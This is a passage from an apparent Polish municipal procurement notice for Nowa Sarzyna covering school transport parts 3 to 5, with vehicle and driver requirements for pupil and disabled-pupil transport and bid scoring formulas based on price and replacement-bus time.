dowozu uczniów związanych ze zmianą organizacji nauki w szkole/przedszkolu przez Dyrektora placówki z co najmniej 2-dniowym wyprzedzeniem.<br/><br/>7. Dyrektor placówki przekaże Wykonawcy imienną listę adresową uczniów i opiekunów uprawnionych do przejazdów na trasie dotyczącej przedmiotowego zadania.<br/><br/>8. Dyrektor placówki lub osoba przez niego upoważniona przygotowuje comiesięczne zestawienia ilościowe biletów, na podstawie danych przekazanych przez Wykonawcę, zatwierdza je i przekazuje do Centrum Usług Wspólnych w Nowej Sarzynie.<br/><br/>9. Dowożenie dzieci będzie się odbywać środkiem transportu w pełni sprawnym technicznie i posiadającym aktualne badania techniczne oraz wyposażonym w klimatyzację. <br/>Kierowca oraz środek transportu, którym odbywać się będzie dowożenie dzieci powinien spełniać wszelkie wymogi określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym oraz przepisów wykonawczych do tej ustawy.<br/><br/>10. Kierowca pojazdu musi posiadać:<br/>a) prawo jazdy kategorii uprawniającej go do prowadzenia pojazdu,<br/>b) aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy, wydane przez uprawnionego lekarza do badania kierowców,<br/>c) przeszkolenie w zakresie przepisów BHP,<br/>d) ukończony kurs udzielania pierwszej pomocy.<br/><br/>11. Kierowca pojazdu zobowiązany jest współdziałać z opiekunem w zakresie bezpieczeństwa w czasie jazdy i postoju, biorąc pod uwagę wskazówki opiekuna.<br/><br/>12. Pojazdy, którymi Wykonawca będzie świadczył usługi muszą posiadać ubezpieczenie OC i NNW oraz muszą być utrzymywane w czystości. Wykonawca ponosi odpowiedzialność za szkody wynikające z naruszenia zasad bezpieczeństwa ruchu drogowego oraz za nie zapewnienie uczniom i opiekunom odpowiednich warunków bezpieczeństwa i higieny w czasie przejazdu.<br/><br/>13. W zimie każdy pojazd musi posiadać ogrzewanie wewnętrzne oraz ogumienie zimowe. Stopnie wejściowe powinny być oczyszczone z ewentualnego oblodzenia, tak by były bezpieczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 60%,<br/>2) Czas podstawienia autobusu zastępczego w razie awarii – (T) – waga 40%.<br/><br/>2. Sposób oceny ofert.<br/>1) Zasady oceny za kryterium „Cena”:<br/>a) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:<br/><br/>C = C(of._min) / C(of._bad) × 60 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of._min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of._bad) – cena oferty badanej.<br/><br/>b) W kryterium „Cena” oferta z najniższą ceną otrzyma 60 pkt. natomiast pozostałe oferty po przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej. <br/><br/>2) Zasady oceny za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”.<br/>a) Punkty za kryterium „Czas podstawienia autobusu zastępczego w razie awarii – (T)” zostaną obliczone w następujący sposób:<br/><br/>Najkrótszy czas podstawienia autobusu zastępczego w razie awarii otrzyma 40 pkt, pozostałe proporcjonalnie mniej wg następującego przelicznika:<br/><br/>T = 40 pkt - [(Tw - 10) x 2 pkt] <br/><br/>gdzie:<br/>T – ilość punktów przyznanych Wykonawcy w kryterium czas podstawienia autobusu zastępczego w razie awarii<br/>Tw – czas podstawienia autobusu zaoferowany przez ocenianego Wykonawcę<br/><br/>b) Czas podstawienia autobusu zastępczego w razie awarii będzie liczony w pełnych minutach.<br/>c) Zamawiający określa minimalny oraz maksymalny czas podstawienia autobusu zastępczego w razie awarii w przedziale od 10 minut do 30 minut.<br/>d) Dla potrzeb oceny punktowej zaoferowany czas podstawienia pojazdu zastępczego w razie awarii krótszy niż 10 minut traktowany będzie jako czas równy 10 minut. <br/>e) Jeżeli Wykonawca zaproponuje czas podstawienia autobusu zastępczego w razie awarii dłuższy niż 30 minut Zamawiający ofertę odrzuci.<br/>f) W przypadku gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego czasu podstawienia autobusu zastępczego w razie awarii Zamawiający uzna, iż Wykonawca nie przewiduje podstawiania autobusu zastępczego w razie awarii i ofertę odrzuci.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Px = Cx + Tx<br/><br/>gdzie:<br/>Px – ilość punktów, które otrzyma oferta „x”,<br/>Cx – ilość punktów, które otrzyma oferta „x” za kryterium „Cena”,<br/>Tx – ilość punktów, które otrzyma oferta „x” za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”<br/><br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza w zakresie poszczególnych części zamówienia. Oferta może uzyskać maksymalnie 100 pkt. w każdej z części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 zamówienia – Zakup biletów miesięcznych dla dzieci i uczniów oraz opiekunów dojeżdżających do Szkoły Podstawowej im. Ks. Stefana Kardynała Wyszyńskiego w Sarzynie, Szkoły Podstawowej w Rudzie Łańcuckiej, Zespołu Szkół w Nowej Sarzynie, Przedszkola Samorządowego „Niezapominajka” w Nowej Sarzynie, Przedszkola Samorządowego „Jedyneczka” w Nowej Sarzynie<br/><br/>1. Przewozy dzieci i uczniów odbywać się będą zgodnie z harmonogramem przedstawionym w pkt. 4.2 ppkt. 3 SWZ. <br/>Zamawiający przekaże Wykonawcy ostateczną liczbę uczniów przed rozpoczęciem roku szkolnego 2024/2025. <br/>Zamawiający odpowiada za bezpieczeństwo przewożonych uczniów w trakcie trwania przewozu oraz zapewnia w tym czasie nad nimi opiekę.<br/>Usługa dowozu dzieci i uczniów do szkół i przedszkoli obejmuje również przewóz opiekunów na podanych trasach. Cena jednego biletu miesięcznego brutto dla dzieci i uczniów (biletu ulgowego) stanowi równowartość 51% ceny jednego biletu miesięcznego brutto dla opiekunów (pełnego biletu). <br/>Dowozu dzieci i uczniów na danej trasie nie można realizować wspólnie z dowozami pasażerów, wykonywanych na liniach regularnych.<br/><br/>2. W przypadku dowozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego przewozy odbywać się będą pojazdami wyposażonymi w:<br/>1) pasy przy każdym fotelu,<br/>2) apteczkę, ze szczególnym uwzględnieniem środków ochrony osobistej,<br/>3) możliwość zasłonięcia szyb,<br/>4) oznaczenia informujące o przewozie osób z niepełnosprawnościami,<br/>5) przestrzeń bagażową, umożliwiającą przewóz plecaków, toreb, ale także kul, chodzików lub złożonego wózka inwalidzkiego.<br/><br/>3. Godziny dowozu i odwozu uczniów, trasa przejazdu oraz liczba dowożonych i odwożonych uczniów mogą ulec zmianie w trakcie realizacji zamówienia. Zamawiający o tym fakcie poinformuje Wykonawcę na piśmie z co najmniej 7 dniowym wyprzedzeniem.<br/><br/>4. Przewóz uczniów do placówek odbywać się będzie w dni nauki szkolnej, w oparciu o obowiązujące Rozporządzenie Ministra Edukacji Narodowej z 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/><br/>5. Wykonawca na zlecenie Dyrektora placówki, zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odpracowywali inne dni zwolnione z nauki szkolnej. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z ustalonym rozkładem jazdy.<br/><br/>6. Dowóz dzieci może być organizowany w dni wolne od zajęć dydaktycznych (np. w dni egzaminów, sprawdzianów, przerw świątecznych oraz w inne dodatkowe wolne dni od zajęć szkolnych). Wykonawca zostanie poinformowany o planowanych zmianach w terminach dowozu uczniów związanych ze zmianą organizacji nauki w szkole/przedszkolu przez Dyrektora placówki z co najmniej 2-dniowym wyprzedzeniem.<br/><br/>7. Dyrektor placówki przekaże Wykonawcy imienną listę adresową uczniów i opiekunów uprawnionych do przejazdów na trasie dotyczącej przedmiotowego zadania.<br/><br/>8. Dyrektor placówki lub osoba przez niego upoważniona przygotowuje comiesięczne zestawienia ilościowe biletów, na podstawie danych przekazanych przez Wykonawcę, zatwierdza je i przekazuje do Centrum Usług Wspólnych w Nowej Sarzynie.<br/><br/>9. Dowożenie dzieci będzie się odbywać środkiem transportu w pełni sprawnym technicznie i posiadającym aktualne badania techniczne oraz wyposażonym w klimatyzację. <br/>Kierowca oraz środek transportu, którym odbywać się będzie dowożenie dzieci powinien spełniać wszelkie wymogi określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym oraz przepisów wykonawczych do tej ustawy.<br/><br/>10. Kierowca pojazdu musi posiadać:<br/>a) prawo jazdy kategorii uprawniającej go do prowadzenia pojazdu,<br/>b) aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy, wydane przez uprawnionego lekarza do badania kierowców,<br/>c) przeszkolenie w zakresie przepisów BHP,<br/>d) ukończony kurs udzielania pierwszej pomocy.<br/><br/>11. Kierowca pojazdu zobowiązany jest współdziałać z opiekunem w zakresie bezpieczeństwa w czasie jazdy i postoju, biorąc pod uwagę wskazówki opiekuna.<br/><br/>12. Pojazdy, którymi Wykonawca będzie świadczył usługi muszą posiadać ubezpieczenie OC i NNW oraz muszą być utrzymywane w czystości. Wykonawca ponosi odpowiedzialność za szkody wynikające z naruszenia zasad bezpieczeństwa ruchu drogowego oraz za nie zapewnienie uczniom i opiekunom odpowiednich warunków bezpieczeństwa i higieny w czasie przejazdu.<br/><br/>13. W zimie każdy pojazd musi posiadać ogrzewanie wewnętrzne oraz ogumienie zimowe. Stopnie wejściowe powinny być oczyszczone z ewentualnego oblodzenia, tak by były bezpieczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 60%,<br/>2) Czas podstawienia autobusu zastępczego w razie awarii – (T) – waga 40%.<br/><br/>2. Sposób oceny ofert.<br/>1) Zasady oceny za kryterium „Cena”:<br/>a) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:<br/><br/>C = C(of._min) / C(of._bad) × 60 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of._min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of._bad) – cena oferty badanej.<br/><br/>b) W kryterium „Cena” oferta z najniższą ceną otrzyma 60 pkt. natomiast pozostałe oferty po przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej. <br/><br/>2) Zasady oceny za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”.<br/>a) Punkty za kryterium „Czas podstawienia autobusu zastępczego w razie awarii – (T)” zostaną obliczone w następujący sposób:<br/><br/>Najkrótszy czas podstawienia autobusu zastępczego w razie awarii otrzyma 40 pkt, pozostałe proporcjonalnie mniej wg następującego przelicznika:<br/><br/>T = 40 pkt - [(Tw - 10) x 2 pkt] <br/><br/>gdzie:<br/>T – ilość punktów przyznanych Wykonawcy w kryterium czas podstawienia autobusu zastępczego w razie awarii<br/>Tw – czas podstawienia autobusu zaoferowany przez ocenianego Wykonawcę<br/><br/>b) Czas podstawienia autobusu zastępczego w razie awarii będzie liczony w pełnych minutach.<br/>c) Zamawiający określa minimalny oraz maksymalny czas podstawienia autobusu zastępczego w razie awarii w przedziale od 10 minut do 30 minut.<br/>d) Dla potrzeb oceny punktowej zaoferowany czas podstawienia pojazdu zastępczego w razie awarii krótszy niż 10 minut traktowany będzie jako czas równy 10 minut. <br/>e) Jeżeli Wykonawca zaproponuje czas podstawienia autobusu zastępczego w razie awarii dłuższy niż 30 minut Zamawiający ofertę odrzuci.<br/>f) W przypadku gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego czasu podstawienia autobusu zastępczego w razie awarii Zamawiający uzna, iż Wykonawca nie przewiduje podstawiania autobusu zastępczego w razie awarii i ofertę odrzuci.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Px = Cx + Tx<br/><br/>gdzie:<br/>Px – ilość punktów, które otrzyma oferta „x”,<br/>Cx – ilość punktów, które otrzyma oferta „x” za kryterium „Cena”,<br/>Tx – ilość punktów, które otrzyma oferta „x” za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”<br/><br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza w zakresie poszczególnych części zamówienia. Oferta może uzyskać maksymalnie 100 pkt. w każdej z części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 zamówienia – Dowóz dzieci i uczniów niepełnosprawnych (około 16) z terenu Miasta i Gminy Nowa Sarzyna do Specjalnego Ośrodka Szkolno–Wychowawczego im. św. Jana Pawła II w Leżajsku<br/><br/>1. Trasa:<br/>Wola Zarczycka (4 uczniów) – Sarzyna (2 uczniów) – Ruda Łańcucka (1 uczeń) – Nowa Sarzyna (8 uczniów) – Jelna (1 uczeń) – i powrót uczniów po skończonych zajęciach.<br/>W powyższym wykazie została podana przewidywana liczba uczniów. Zamawiający przekaże Wykonawcy ostateczną liczbę uczniów przed rozpoczęciem roku szkolnego 2024/2025.<br/>Realizacja zadania polega na przewozie dzieci i uczniów na trasie dom – ośrodek – dom pod opieką opiekuna (opiekę nad dziećmi i uczniami zapewnia Wykonawca). <br/>Opiekun dowozu dzieci z niepełnosprawnymi musi posiadać ukończony kurs udzielania pierwszej pomocy.<br/>Łączna ilość kilometrów usługi dziennej na w/w trasie wynosi ok. 100 km. Zakładana ilość dni, w których wykonywana będzie usługa wynosi 188. <br/>Dowożenie dzieci i uczniów niepełnosprawnych odbywać się będzie środkiem transportu przystosowanym do przewozu osób niepełnosprawnych.<br/><br/>2. W przypadku dowozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego przewozy odbywać się będą pojazdami wyposażonymi w:<br/>1) pasy przy każdym fotelu,<br/>2) apteczkę, ze szczególnym uwzględnieniem środków ochrony osobistej,<br/>3) możliwość zasłonięcia szyb,<br/>4) oznaczenia informujące o przewozie osób z niepełnosprawnościami,<br/>5) przestrzeń bagażową, umożliwiającą przewóz plecaków, toreb, ale także kul, chodzików lub złożonego wózka inwalidzkiego.<br/><br/>3. Godziny dowozu i odwozu uczniów, trasa przejazdu oraz liczba dowożonych i odwożonych uczniów mogą ulec zmianie w trakcie realizacji zamówienia. Zamawiający o tym fakcie poinformuje Wykonawcę na piśmie z co najmniej 7 dniowym wyprzedzeniem.<br/><br/>4. Przewóz uczniów do placówek odbywać się będzie w dni nauki szkolnej, w oparciu o obowiązujące Rozporządzenie Ministra Edukacji Narodowej z 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/><br/>5. Wykonawca na zlecenie Dyrektora placówki, zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odpracowywali inne dni zwolnione z nauki szkolnej. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z ustalonym rozkładem jazdy.<br/><br/>6. Dowóz dzieci może być organizowany w dni wolne od zajęć dydaktycznych (np. w dni egzaminów, sprawdzianów, przerw świątecznych oraz w inne dodatkowe wolne dni od zajęć szkolnych). Wykonawca zostanie poinformowany o planowanych zmianach w terminach dowozu uczniów związanych ze zmianą organizacji nauki w szkole/przedszkolu przez Dyrektora placówki z co najmniej 2-dniowym wyprzedzeniem.<br/><br/>7. Dyrektor placówki przekaże Wykonawcy imienną listę adresową uczniów i opiekunów uprawnionych do przejazdów na trasie dotyczącej przedmiotowego zadania.<br/><br/>8. Dyrektor placówki lub osoba przez niego upoważniona przygotowuje comiesięczne zestawienia liczby dni wykonanych przewozów na podstawie danych przekazanych przez Wykonawcę, zatwierdza je i przekazuje do Centrum Usług Wspólnych w Nowej Sarzynie.<br/><br/>9. Dowożenie dzieci będzie się odbywać środkiem transportu w pełni sprawnym technicznie i posiadającym aktualne badania techniczne oraz wyposażonym w klimatyzację. <br/>Kierowca oraz środek transportu, którym odbywać się będzie dowożenie dzieci powinien spełniać wszelkie wymogi określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym oraz przepisów wykonawczych do tej ustawy.<br/><br/>10. Kierowca pojazdu musi posiadać:<br/>a) prawo jazdy kategorii uprawniającej go do prowadzenia pojazdu,<br/>b) aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy, wydane przez uprawnionego lekarza do badania kierowców,<br/>c) przeszkolenie w zakresie przepisów BHP,<br/>d) ukończony kurs udzielania pierwszej pomocy.<br/><br/>11. Kierowca pojazdu zobowiązany jest współdziałać z opiekunem w zakresie bezpieczeństwa w czasie jazdy i postoju, biorąc pod uwagę wskazówki opiekuna.<br/><br/>12. Pojazdy, którymi Wykonawca będzie świadczył usługi muszą posiadać ubezpieczenie OC i NNW oraz muszą być utrzymywane w czystości. Wykonawca ponosi odpowiedzialność za szkody wynikające z naruszenia zasad bezpieczeństwa ruchu drogowego oraz za nie zapewnienie uczniom i opiekunom odpowiednich warunków bezpieczeństwa i higieny w czasie przejazdu.<br/><br/>13. W zimie każdy pojazd musi posiadać ogrzewanie wewnętrzne oraz ogumienie zimowe. Stopnie wejściowe powinny być oczyszczone z ewentualnego oblodzenia, tak by były bezpieczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 60%,<br/>2) Czas podstawienia autobusu zastępczego w razie awarii – (T) – waga 40%.<br/><br/>2. Sposób oceny ofert.<br/>1) Zasady oceny za kryterium „Cena”:<br/>a) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:<br/><br/>C = C(of._min) / C(of._bad) × 60 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of._min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of._bad) – cena oferty badanej.<br/><br/>b) W kryterium „Cena” oferta z najniższą ceną otrzyma 60 pkt. natomiast pozostałe oferty po przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej. <br/><br/>2) Zasady oceny za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”.<br/>a) Punkty za kryterium „Czas podstawienia autobusu zastępczego w razie awarii – (T)” zostaną obliczone w następujący sposób:<br/><br/>Najkrótszy czas podstawienia autobusu zastępczego w razie awarii otrzyma 40 pkt, pozostałe proporcjonalnie mniej wg następującego przelicznika:<br/><br/>T = 40 pkt - [(Tw - 10) x 2 pkt] <br/><br/>gdzie:<br/>T – ilość punktów przyznanych Wykonawcy w kryterium czas podstawienia autobusu zastępczego w razie awarii<br/>Tw – czas podstawienia autobusu zaoferowany przez ocenianego Wykonawcę<br/><br/>b) Czas podstawienia autobusu zastępczego w razie awarii będzie liczony w pełnych minutach.<br/>c) Zamawiający określa minimalny oraz maksymalny czas podstawienia autobusu zastępczego w razie awarii w przedziale od 10 minut do 30 minut.<br/>d) Dla potrzeb oceny punktowej zaoferowany czas podstawienia pojazdu zastępczego w razie awarii krótszy niż 10 minut traktowany będzie jako czas równy 10 minut. <br/>e) Jeżeli Wykonawca zaproponuje czas podstawienia autobusu zastępczego w razie awarii dłuższy niż 30 minut Zamawiający ofertę odrzuci.<br/>f) W przypadku gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego czasu podstawienia autobusu zastępczego w razie awarii Zamawiający uzna, iż Wykonawca nie przewiduje podstawiania autobusu zastępczego w razie awarii i ofertę odrzuci.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Px = Cx + Tx<br/><br/>gdzie:<br/>Px – ilość punktów, które otrzyma oferta „x”,<br/>Cx – ilość punktów, które otrzyma oferta „x” za kryterium „Cena”,<br/>Tx – ilość punktów, które otrzyma oferta „x” za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”<br/><br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza w zakresie poszczególnych części zamówienia. Oferta może uzyskać maksymalnie 100 pkt. w każdej z części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 zamówienia – Dowóz uczniów na zajęcia sportowe do Miejskiego Ośrodka Sportu i Rekreacji w Nowej Sarzynie<br/><br/>1. Przewozy dzieci i uczniów odbywać się będą zgodnie z harmonogramem przedstawionym w pkt. 4.2 ppkt. 5 SWZ.<br/>Łączna ilość kilometrów usługi w ciągu roku wyniesie około 8 564 km.<br/>Zamawiający odpowiada za bezpieczeństwo przewożonych uczniów w trakcie trwania przewozu oraz zapewnia w tym czasie nad nimi opiekę.<br/>Dowozu dzieci i uczniów na danej trasie nie można realizować wspólnie z dowozami pasażerów, wykonywanych na liniach regularnych.<br/><br/>2. W przypadku dowozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego przewozy odbywać się będą pojazdami wyposażonymi w:<br/>1) pasy przy każdym fotelu,<br/>2) apteczkę, ze szczególnym uwzględnieniem środków ochrony osobistej,<br/>3) możliwość zasłonięcia szyb,<br/>4) oznaczenia informujące o przewozie osób z niepełnosprawnościami,<br/>5) przestrzeń bagażową, umożliwiającą przewóz plecaków, toreb, ale także kul, chodzików lub złożonego wózka inwalidzkiego.<br/><br/>3. Godziny dowozu i odwozu uczniów, trasa przejazdu oraz liczba dowożonych i odwożonych uczniów mogą ulec zmianie w trakcie realizacji zamówienia. Zamawiający o tym fakcie poinformuje Wykonawcę na piśmie z co najmniej 7 dniowym wyprzedzeniem.<br/><br/>4. Przewóz uczniów do placówek odbywać się będzie w dni nauki szkolnej, w oparciu o obowiązujące Rozporządzenie Ministra Edukacji Narodowej z 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/><br/>5. Wykonawca na zlecenie Dyrektora placówki, zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odpracowywali inne dni zwolnione z nauki szkolnej. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z ustalonym rozkładem jazdy.<br/><br/>6. Dowóz dzieci może być organizowany w dni wolne od zajęć dydaktycznych (np. w dni egzaminów, sprawdzianów, przerw świątecznych oraz w inne dodatkowe wolne dni od zajęć szkolnych). Wykonawca zostanie poinformowany o planowanych zmianach w terminach dowozu uczniów związanych ze zmianą organizacji nauki w szkole/przedszkolu przez Dyrektora placówki z co najmniej 2-dniowym wyprzedzeniem.<br/><br/>7. Dyrektor placówki przekaże Wykonawcy imienną listę adresową uczniów i opiekunów uprawnionych do przejazdów na trasie dotyczącej przedmiotowego zadania.<br/><br/>8. Dyrektor placówki lub osoba przez niego upoważniona przygotowuje comiesięczne zestawienia przejechanych kilometrów na podstawie danych przekazanych przez Wykonawcę, zatwierdza je i przekazuje do Centrum Usług Wspólnych w Nowej Sarzynie.<br/><br/>9. Dowożenie dzieci będzie się odbywać środkiem transportu w pełni sprawnym technicznie i posiadającym aktualne badania techniczne oraz wyposażonym w klimatyzację. <br/>Kierowca oraz środek transportu, którym odbywać się będzie dowożenie dzieci powinien spełniać wszelkie wymogi określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym oraz przepisów wykonawczych do tej ustawy.<br/><br/>10. Kierowca pojazdu musi posiadać:<br/>a) prawo jazdy kategorii uprawniającej go do prowadzenia pojazdu,<br/>b) aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy, wydane przez uprawnionego lekarza do badania kierowców,<br/>c) przeszkolenie w zakresie przepisów BHP,<br/>d) ukończony kurs udzielania pierwszej pomocy.<br/><br/>11. Kierowca pojazdu zobowiązany jest współdziałać z opiekunem w zakresie bezpieczeństwa w czasie jazdy i postoju, biorąc pod 